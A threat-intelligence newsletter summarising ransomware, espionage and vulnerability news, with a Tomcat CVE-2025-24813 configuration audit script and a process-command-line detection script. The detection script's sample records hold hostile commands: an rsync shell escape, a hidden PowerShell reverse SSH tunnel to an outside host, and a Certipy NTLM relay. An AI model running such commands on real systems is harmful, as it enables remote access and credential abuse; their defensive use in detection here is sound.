Threat Intelligence News from LevelBlue SpiderLabs April 2025

Latest Threat Intelligence News

Black Basta RaaS: Latest TTPs

Two blogs were published this month regarding Black Basta's TTPs.

The first blog, written by Trend Micro, describes how the Black Basta and Cactus ransomware groups are leveraging BackConnect malware. Both groups gained initial access through a multi-stage social engineering attack: victims were first flooded with phishing emails posing as IT helpdesk messages, then contacted over Microsoft Teams and persuaded to grant Quick Assist access, giving the attacker a remote session on the victim's system. Finally, BackConnect malware was installed to maintain persistent control and exfiltrate sensitive data from the compromised machines.

The second blog, by EclecticIQ, analyzed the internal Black Basta chat logs leaked in February 2025. The analysis concluded that the group was targeting vulnerable or weakly configured edge network devices to gain an initial foothold, using a previously unknown brute-forcing framework named BRUTED. The framework lets Black Basta affiliates automate and scale credential attacks against these devices, expanding their victim pool and accelerating monetization of ransomware operations.

VanHelsing: New RaaS

Check Point published a blog reporting on a new RaaS named VanHelsing. Since the service launched on March 7, 2025, Check Point has already identified two malware samples targeting Windows and three different victims. The group does not appear to limit itself to one platform: it claims to also target Linux, BSD, ESXi and ARM-based systems. Affiliates can join after a $5,000 deposit, and the only rule is not to target the Commonwealth of Independent States (CIS).

UNC3886 Targets Juniper Routers

Mandiant published a blog that deep-dives into an operation by the China-nexus espionage group UNC3886 targeting Juniper routers. The campaign was first identified by Mandiant in mid-2024 and involved several backdoors built on a basic TINYSHELL implementation for FreeBSD (the operating system underlying Junos OS), each heavily customized with unique capabilities, as reported by Mandiant.

The victims were running end-of-life hardware and software. Juniper has released updated software images, and affected customers should upgrade and run Juniper's malware removal tool to check for the backdoors.

Apache Tomcat RCE (CVE-2025-24813)

CVE-2025-24813 is a critical path equivalence vulnerability in Apache Tomcat's default servlet. Where the default servlet has writes enabled and partial PUT support is on, an attacker who knows a filename could view or modify security-sensitive files. Recorded Future counted over 378,000 exposed Tomcat endpoints in its Shodan research. Under certain configurations the vulnerability leads to remote code execution (RCE), but the conditions are strict (writes enabled on the default servlet, partial PUT enabled, file-based session persistence at its default location, and a deserialization gadget on the classpath), which greatly reduces the number of exposed hosts vulnerable to RCE. Recorded Future has observed exploitation attempts in the wild.
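As an added example (not code from this page, from LevelBlue or from the Apache Tomcat project), the Python script below audits the two Tomcat configuration files that decide whether CVE-2025-24813 is reachable at all and whether the RCE preconditions are met: the `readonly` and `allowPartialPut` init-params of the DefaultServlet in conf/web.xml, and a PersistentManager with a FileStore in conf/context.xml. The XML snippets are constructed samples and the function names are the author's own. The remaining RCE precondition, a deserialization gadget on the classpath, cannot be seen from configuration and is not checked here.

```python
"""Audit Tomcat configuration for the settings that make CVE-2025-24813
reachable (writable default servlet + partial PUT) and that complete the
RCE path (file-based session persistence).

Added example, not LevelBlue or Apache code. The sample XML below is
constructed for illustration; on a real host pass in the contents of
conf/web.xml and conf/context.xml instead.
"""
import xml.etree.ElementTree as ET

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"


def _local(tag: str) -> str:
    """Strip the XML namespace prefix (web.xml declares a default namespace)."""
    return tag.rsplit("}", 1)[-1]


def _init_params(servlet) -> dict:
    """Collect <init-param> name/value pairs of one <servlet> element."""
    params = {}
    for child in servlet:
        if _local(child.tag) != "init-param":
            continue
        name = value = None
        for field in child:
            if _local(field.tag) == "param-name":
                name = (field.text or "").strip()
            elif _local(field.tag) == "param-value":
                value = (field.text or "").strip()
        if name is not None:
            params[name] = value
    return params


def audit_web_xml(web_xml: str) -> dict:
    """Return the DefaultServlet settings relevant to CVE-2025-24813.

    Tomcat's shipped defaults are readonly=true (PUT/DELETE rejected) and
    allowPartialPut=true, so an administrator must have set readonly=false
    for the bug to be reachable at all."""
    root = ET.fromstring(web_xml)
    result = {"found": False, "readonly": True, "allowPartialPut": True}
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls = ""
        for field in servlet:
            if _local(field.tag) == "servlet-class":
                cls = (field.text or "").strip()
        if cls != DEFAULT_SERVLET:
            continue
        result["found"] = True
        params = _init_params(servlet)
        if "readonly" in params:
            result["readonly"] = params["readonly"].lower() == "true"
        if "allowPartialPut" in params:
            result["allowPartialPut"] = params["allowPartialPut"].lower() == "true"
    result["writable_partial_put"] = (not result["readonly"]) and result["allowPartialPut"]
    return result


def audit_context_xml(context_xml: str) -> bool:
    """True if file-based session persistence (PersistentManager with a
    FileStore) is configured, the precondition that turns a file write
    into deserialization of attacker-controlled session data."""
    root = ET.fromstring(context_xml)
    for manager in root.iter("Manager"):
        if manager.get("className", "").endswith("PersistentManager"):
            for store in manager.findall("Store"):
                if store.get("className", "").endswith("FileStore"):
                    return True
    return False


def rce_preconditions_met(web_xml: str, context_xml: str) -> bool:
    """Combine both config checks. A gadget library on the classpath is the
    last precondition and is outside what configuration can tell us."""
    return audit_web_xml(web_xml)["writable_partial_put"] and audit_context_xml(context_xml)


# Constructed samples: an admin enabled writes and left partial PUT at its
# default, and sessions are persisted to disk (weak); then the hardened form.
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

HARDENED_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>true</param-value></init-param>
    <init-param><param-name>allowPartialPut</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

WEAK_CONTEXT_XML = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore"/>
  </Manager>
</Context>"""

HARDENED_CONTEXT_XML = "<Context/>"

if __name__ == "__main__":
    print("weak config meets RCE preconditions:",
          rce_preconditions_met(WEAK_WEB_XML, WEAK_CONTEXT_XML))
    print("hardened config meets RCE preconditions:",
          rce_preconditions_met(HARDENED_WEB_XML, HARDENED_CONTEXT_XML))
```

On a real host read `$CATALINA_BASE/conf/web.xml` and `conf/context.xml`, plus any per-application `WEB-INF/web.xml` or `META-INF/context.xml` that overrides them, and pass the text in. Whatever the audit reports, the actual fix is upgrading to a patched release (Tomcat 9.0.99, 10.1.35 or 11.0.3 and later); the settings checked here only remove the preconditions.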

Veeam Backup RCE (CVE-2025-23120)

Backup and recovery software vendor Veeam published a security advisory on March 19 for a critical RCE vulnerability (CVE-2025-23120) in Veeam Backup & Replication. The vulnerability affects backup servers that are joined to a Windows domain and can be exploited by an authenticated domain user, one more reason to keep backup infrastructure off the production domain.

No public proof of concept has been published, but watchTowr has released technical details on the vulnerability and its similarities to the older CVE-2024-40711, which eases the path to a working exploit.

Tracking, Detection & Hunting Capabilities

LevelBlue SpiderLabs has created the following Adversary Trackers to automatically identify and detect malicious infrastructure:

  • GhostSock: a Golang-based SOCKS5 proxy malware whose operators have a collaboration agreement with the Lumma infostealer operators, offering discounts to each other's customers.
  • Kongtuke: a JavaScript downloader previously known for fake browser update lures that tricked users into downloading its payloads; it has recently been observed serving fake "verify you are human" captcha pages that lead users to execute malicious PowerShell commands.

The following Adversary Trackers have also been updated during the month of March:

  • Amadey

  • RaccoonO365

  • Brute Ratel

  • Mamba2FA

  • Mythic

The team has identified the following malware/threat actors as the most active during the month of March:

  • SocGholish: continues to be the most relevant malware observed by LevelBlue SpiderLabs, mainly because of the number of compromised websites it is served from and how frequently they are visited. In addition to its usual activity, Trend Micro reported this month that SocGholish is a key enabler in deploying RansomHub ransomware through compromised websites.

[Chart: most active malware and threat actors, March 2025]

The LevelBlue trackers have identified over 2,000 new IOCs for the different families they track. The busiest trackers during the month of March have been:

[Chart: new IOCs per tracker, March 2025]


USM Anywhere Detection Improvements

In March, LevelBlue SpiderLabs added or updated 109 USM Anywhere detections. Here are a few examples of improvements and new elements LevelBlue SpiderLabs developed:

  • A major refresh of the CrowdStrike ruleset, with updates and additions to 46 detections. This covers the malware, ransomware and malicious-document rules as well as rules for specific techniques around persistence, defense evasion and command-and-control (C&C) communications.

  • Improved the displayed descriptions in the ESET ruleset.

  • New detections for IT tools being used for malicious purposes, such as Rsync for shell execution, PowerShell-launched reverse SSH tunnels, and NTLM relay attacks with Certipy.
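To make the third item concrete, here is an added example (not USM Anywhere rule content and not LevelBlue's detection logic) of what such detections look like when run over process-creation records. The record format, the rule heuristics and the sample command lines are all constructed for illustration: rsync's `-e`/`--rsh` option naming a shell, PowerShell spawning ssh with a `-R` remote port forward, and the `certipy relay` subcommand.

```python
"""Heuristic detections for three IT tools abused for malicious ends, run
over constructed process-creation records.

Added example: not USM Anywhere rule content and not LevelBlue's detection
logic. The heuristics are the author's assumptions about how these tools
look when misused; tune them against your own telemetry before use.
"""
import re

# A shell named as rsync's remote-shell program (optionally with a path).
SHELL_RE = re.compile(r"^(/bin/|/usr/bin/)?(sh|bash|zsh|dash)\b")


def tokenize(cmd: str) -> list:
    """Split a command line into arguments, honouring simple quoting but not
    performing shell escape processing, so Windows paths keep backslashes."""
    return [a or b or c for a, b, c in re.findall(r'"([^"]*)"|\'([^\']*)\'|(\S+)', cmd)]


def basename(path: str) -> str:
    """Last path component, lower-cased, for either path separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def rsync_shell_exec(argv: list) -> bool:
    """rsync -e / --rsh names the transport program; a shell there runs
    arbitrary commands (e.g. rsync -e 'sh -c "..."' host:/dev/null)."""
    if not argv or basename(argv[0]) != "rsync":
        return False
    for i, arg in enumerate(argv):
        if arg in ("-e", "--rsh") and i + 1 < len(argv):
            return bool(SHELL_RE.match(argv[i + 1]))
        if arg.startswith("--rsh="):
            return bool(SHELL_RE.match(arg[len("--rsh="):]))
    return False


def powershell_reverse_ssh(argv: list) -> bool:
    """powershell/pwsh spawning ssh with -R (remote port forward): a tunnel
    that exposes an internal port on a remote, attacker-controlled host."""
    if not argv or basename(argv[0]) not in ("powershell.exe", "pwsh.exe", "powershell", "pwsh"):
        return False
    joined = " ".join(argv[1:])
    return bool(re.search(r"\bssh(\.exe)?\b.*\s-R\s*\d+:", joined))


def certipy_relay(argv: list) -> bool:
    """Certipy's 'relay' subcommand relays NTLM authentication to AD CS
    web enrollment to obtain certificates for other accounts."""
    return len(argv) > 1 and basename(argv[0]) in ("certipy", "certipy-ad") and argv[1] == "relay"


RULES = [
    ("Rsync for Shell Execution", rsync_shell_exec),
    ("PowerShell reverse SSH tunnel", powershell_reverse_ssh),
    ("NTLM relay with Certipy", certipy_relay),
]


def detect(record: dict) -> list:
    """Return the names of all rules matching one process-creation record."""
    argv = tokenize(record["cmd"])
    return [name for name, rule in RULES if rule(argv)]


def run_detections(records: list) -> list:
    """Return (host, rule) pairs for every hit across a batch of records."""
    return [(r["host"], name) for r in records for name in detect(r)]


# Constructed sample records (not real telemetry). 203.0.113.0/24 is a
# documentation address range and corp.example is a placeholder domain.
SAMPLE_RECORDS = [
    {"host": "web01", "user": "www-data",
     "cmd": "rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"},
    {"host": "web01", "user": "backup",  # benign: ssh as the transport
     "cmd": "rsync -avz -e ssh /srv/backup/ backup@203.0.113.10:/backups/"},
    {"host": "ws17", "user": "CORP\\jdoe",
     "cmd": 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden '
            '-c "ssh -N -R 2222:127.0.0.1:3389 user@203.0.113.5"'},
    {"host": "ws17", "user": "CORP\\jdoe",  # benign PowerShell use
     "cmd": "powershell.exe -NoProfile -Command Get-Process"},
    {"host": "kali-ops", "user": "root",
     "cmd": "certipy relay -target http://ca.corp.example -template DomainController"},
]

if __name__ == "__main__":
    for host, rule in run_detections(SAMPLE_RECORDS):
        print(f"{host}: {rule}")
```

Only the three malicious records fire; the benign rsync-over-ssh backup and the plain PowerShell invocation do not. Command-line matching like this is a starting point, not a finished rule: pair it with parent-process and user context (rsync from a web server account, PowerShell launched by a browser or Office process) to keep false positives down.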

Please visit the LevelBlue Success Center for a full list of improvements, new elements, issues found, and tasks created.


LevelBlue SpiderLabs Open Threat Exchange

LevelBlue SpiderLabs Open Threat Exchange (OTX) is among the world’s largest open threat intelligence sharing communities, made up of 450,000 threat researchers from 140 countries globally who publish threat information to the platform daily. LevelBlue SpiderLabs validates, analyzes, and enriches this threat intelligence. Members of OTX benefit from the collective research, can contribute to the community, analyze threats, create public and private threat intelligence sharing groups, and more.

Learn more about OTX, its benefits, and how you can join here

New OTX Pulses

The LevelBlue SpiderLabs team continuously publishes new pulses in OTX based on its research and discoveries. Pulses are interactive, searchable repositories of information about threats, threat actors, campaigns and more, including indicators of compromise (IoCs) that members can use directly.

In March, 117 new Pulses were created by the SpiderLabs team, providing coverage for the latest threats and campaigns. Here are a few examples of the most relevant new Pulses:

ABOUT LEVELBLUE

LevelBlue is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.
